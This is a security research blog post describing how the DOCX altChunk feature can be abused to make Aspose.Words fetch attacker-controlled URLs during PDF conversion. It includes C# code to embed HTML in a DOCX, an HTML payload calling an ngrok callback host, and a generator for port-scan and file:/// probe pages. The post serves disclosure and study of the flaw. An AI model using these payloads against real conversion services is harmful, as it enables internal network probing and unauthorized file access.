New year, new post!🥳
During some security research, I found myself digging into a web application with a DOCX upload feature. It seemed so secure: how could I break it? In this particular case I had to shake the foundations, so I started reading the Office OpenXML Reference.
Nothing particularly interesting, until I reached this section:
My eyes lit up: there is an officially supported feature in the OpenXML standard that lets me embed an HTML page within the document!
The reference documentation states:
An alternative format import part allows content specified in an alternate format specified above to be embedded directly in a WordprocessingML document in order to allow that content to be migrated to the WordprocessingML format.
Embedding altChunk into a regular DOCX file
I wrote a simple C# program that embeds a chosen HTML/MHTML file into a DOCX:
using DocumentFormat.OpenXml.Packaging;
using DocumentFormat.OpenXml.Wordprocessing;
using System.IO;
using System.Linq;

namespace Conversion
{
    class Program
    {
        static void Main(string[] args)
        {
            // fileName2: the HTML/MHTML file to embed.
            // fileName1: the DOCX that will host it (modified in place).
            string fileName2 = @"C:\PathToHTMLFile\Page.mht";
            string fileName1 = @"C:\PathToOriginalDOCXFile\doc.docx";

            // Open the DOCX in read/write mode.
            using (WordprocessingDocument myDoc =
                WordprocessingDocument.Open(fileName1, true))
            {
                string altChunkId = "AltChunkId1";
                MainDocumentPart mainPart = myDoc.MainDocumentPart;

                // Add a new package part that stores the raw MHTML content.
                AlternativeFormatImportPart chunk =
                    mainPart.AddAlternativeFormatImportPart(
                        AlternativeFormatImportPartType.Mht, altChunkId);
                using (FileStream fileStream = File.Open(fileName2, FileMode.Open))
                    chunk.FeedData(fileStream);

                // Reference that part from the body through its relationship ID.
                AltChunk altChunk = new AltChunk();
                altChunk.Id = altChunkId;

                // Insert the chunk after the last paragraph
                // (Last() throws if the document has no paragraphs).
                mainPart.Document
                    .Body
                    .InsertAfter(altChunk, mainPart.Document.Body
                        .Elements<Paragraph>().Last());
                mainPart.Document.Save();
            }
        }
    }
}
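To check that the chunk really ended up in the package, it can help to look at the relationships of the main document part. The sketch below is not part of the program above: it relies only on System.IO.Compression and System.Xml.Linq, and it assumes the main part sits at the conventional word/document.xml location, with its relationships in word/_rels/document.xml.rels. The names AltChunkInspector and FindAltChunkTargets are made up for this illustration.

```csharp
using System.Collections.Generic;
using System.IO;
using System.IO.Compression;
using System.Xml.Linq;

static class AltChunkInspector
{
    // Relationship type used for alternative format import parts (aFChunk).
    const string AltChunkRelType =
        "http://schemas.openxmlformats.org/officeDocument/2006/relationships/aFChunk";

    // XML namespace of the package relationship files (*.rels).
    static readonly XNamespace Rel =
        "http://schemas.openxmlformats.org/package/2006/relationships";

    // Returns "relationship Id -> Target" for every altChunk part referenced
    // by the main document. Assumption: conventional word/document.xml layout.
    public static Dictionary<string, string> FindAltChunkTargets(Stream docx)
    {
        var result = new Dictionary<string, string>();
        using (var zip = new ZipArchive(docx, ZipArchiveMode.Read, leaveOpen: true))
        {
            ZipArchiveEntry rels = zip.GetEntry("word/_rels/document.xml.rels");
            if (rels == null)
                return result; // no relationships file, so no altChunk parts

            using (Stream s = rels.Open())
            {
                XDocument xml = XDocument.Load(s);
                foreach (XElement r in xml.Root.Elements(Rel + "Relationship"))
                {
                    // Keep only relationships that point at an altChunk part.
                    if ((string)r.Attribute("Type") == AltChunkRelType)
                        result[(string)r.Attribute("Id")] = (string)r.Attribute("Target");
                }
            }
        }
        return result;
    }
}
```

Calling AltChunkInspector.FindAltChunkTargets(File.OpenRead(path)) on the document produced above should return one entry keyed by AltChunkId1. The same check could also be run on uploaded files to spot documents that carry embedded HTML.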
A Penetration Tester's perspective
Although altChunk greatly simplifies document creation, it can be misused by an attacker. In fact, it allows us to write HTML code that will be converted into WordprocessingML XML tags by Word's internal engine or by any library that parses the document.
We could possibly achieve things like:
- XSS
- SSRF
- up to RCE
Let’s dive into a real world example…
Aspose.Words and altChunks
Let’s suppose we have an application that converts any DOCX file to PDF. Inspecting its behaviour, we notice that we can’t trigger anything harmful by using macros, OLE objects, fields or XXE.
So ugly, but we are interested in content, not shape!
Fortunately, the feature above comes to our rescue. By placing this code block in an HTML file:
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<embed src="http://75bb-80-104-79-137.ngrok.io/a.png"></embed>
</body>
</html>
and then encapsulating it in the malicious DOCX file, we can force Word, or a library that parses the document, to resolve this address while building the output PDF.
We have in fact achieved a Blind SSRF.
We could then try these things:
- Check for open/closed ports by observing response timing
- Open images by using any supported URI scheme (yes, even file:///)
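As a rough illustration of the two ideas above, the helper below generates one probe page per target URL, reusing the HTML page shown earlier. It is only a sketch: ProbePages, BuildProbeHtml and BuildPortProbes are hypothetical names, and the host and ports are placeholders to be chosen by the tester.

```csharp
using System.Collections.Generic;
using System.Net;

static class ProbePages
{
    // Builds the page shown earlier, with <embed> pointing at an arbitrary URL
    // (http://, file:/// or any other scheme the converter happens to support).
    public static string BuildProbeHtml(string targetUrl)
    {
        // HTML-encode the URL so quotes or ampersands cannot break the attribute.
        string src = WebUtility.HtmlEncode(targetUrl);
        return "<!DOCTYPE html>\n<html>\n<head>\n</head>\n<body>\n" +
               "<embed src=\"" + src + "\"></embed>\n" +
               "</body>\n</html>\n";
    }

    // Builds one probe page per port on the given host.
    public static Dictionary<int, string> BuildPortProbes(string host, IEnumerable<int> ports)
    {
        var pages = new Dictionary<int, string>();
        foreach (int port in ports)
            pages[port] = BuildProbeHtml("http://" + host + ":" + port + "/");
        return pages;
    }
}
```

Each generated page would then be embedded as an altChunk in its own DOCX and submitted for conversion, timing every request (for example with System.Diagnostics.Stopwatch). Which timing difference separates an open port from a closed or filtered one depends on the target's network and on the library's timeouts, so it is worth calibrating against a port whose state is already known.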
NOTE: The attack above works against the latest Aspose.Words package. I haven’t tried other packages yet, but this feature should not be underestimated.
Stay tuned!
PS: Let me know in the comments if you find another way to misuse this feature!